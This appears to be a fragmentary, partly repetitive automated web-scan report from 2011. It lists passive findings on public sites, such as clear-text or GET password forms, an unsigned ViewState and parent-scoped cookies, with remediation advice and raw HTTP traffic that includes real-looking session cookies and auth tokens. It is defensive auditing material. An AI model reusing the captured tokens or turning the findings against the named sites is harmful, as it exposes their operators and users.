GET /crossdomain.xml HTTP/1.1 Host: activity.livefaceonweb.com Proxy-Connection: keep-alive Referer: http://www.toprewardscentral.com/mindquiz_flv/lfow.swf?lfID=100002004&cOMW=0&cOMURL=http%3A//www.livefaceonweb.com&cOMWP=0&tDLB=0&tDLA=0&fIE=1&fIET=1&fIEP=1&fOE=1&fOET=1&pBBE=0&pBBBOF=0&pBAE=0&pBAOF=0&sFRAME=0&pBuffer=30&lfAffiliateID=2&sURL_Site=http%3A//www.theiq-quiz.com/hv1iqqz/MjAxMTAxMDgtMTczLjE5My4yMTQuMjQz/index.php%3Fweb_id%3DCD99%26exitpops%3D9175 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 18 Feb 2010 19:27:08 GMT
Accept-Ranges: bytes
ETag: "f019885cd0b0ca1:0"
Server: Microsoft-IIS/7.0
Date: Sun, 09 Jan 2011 01:34:43 GMT
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://activity.livefaceonweb.com/default.aspx
The form contains the following password field:
txtPass
Request
GET / HTTP/1.1
Host: activity.livefaceonweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Sun, 09 Jan 2011 02:02:02 GMT
Connection: close
Content-Length: 2896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://diythemes.com/amember/login.php
The form contains the following password field:
amember_pass
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://mail.cmsinter.net/Login.aspx
The form contains the following password field:
txtPassword
Request
GET /Login.aspx HTTP/1.1 Host: mail.cmsinter.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267; authCookie=;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:21:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 8153
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy2.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field:
password
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /video/426755/peanut-labs/ HTTP/1.1 Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:22 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 02:33:33 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT ETag: b8fdf6d76062d0f9cc23a77e2e8edebb Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81237
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://themeforest.net/signin/authenticate
The form contains the following password field:
password
Request
GET /user/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field:
password
Request
GET /extend/plugins/wp-pagenavi/ HTTP/1.1 Host: wordpress.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 09 Jan 2011 02:29:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 23436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil ...[SNIP]... </h2>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.43things.com/auth/login
The form contains the following password field:
person[password]
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]... </div>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.facebook.com/
The form contains the following password field:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.mlive.com/
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:45 GMT Date: Sun, 09 Jan 2011 01:44:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107391
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.onestat.com/Default.aspx
The form contains the following password field:
MemberLoginCompact1$Login1$Password
Request
GET / HTTP/1.1 Host: www.onestat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 02:31:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wdsxsqfwe5o3umirakad3355; path=/; HttpOnly Set-Cookie: UILanguage=en; expires=Sat, 09-Jan-2016 02:31:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> OneStat.com We ...[SNIP]... <div class="container"> <form name="form1" method="post" action="Default.aspx" id="form1"> <div> ...[SNIP]... <td><input name="MemberLoginCompact1$Login1$Password" type="password" id="MemberLoginCompact1_Login1_Password" class="login" /></td> ...[SNIP]...
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET / HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Sun, 02 Jan 2011 03:07:02 GMT Last-Modified: Sun, 09 Jan 2011 03:08:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com/xmlrpc.php Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46540
7. Password field submitted using GET method
Summary
Severity: Low
Confidence: Certain
Host: http://www.rockband.com
Path: /
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.rockband.com/
The form contains the following password field:
password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
GET / HTTP/1.1 Host: beta-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 09 Jan 2011 02:03:43 GMT Content-Length: 1402 Connection: close Set-Cookie: A07L=CT; expires=Sun, 06-Feb-2011 02:03:43 GMT; path=/; domain=beta-ads.ace.advertising.com P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1 Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /peanutlabs/ HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a8a/4/a7/%2a/i;227307433;1-0;0;50967133;3454-728/90;34263360/34281238/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
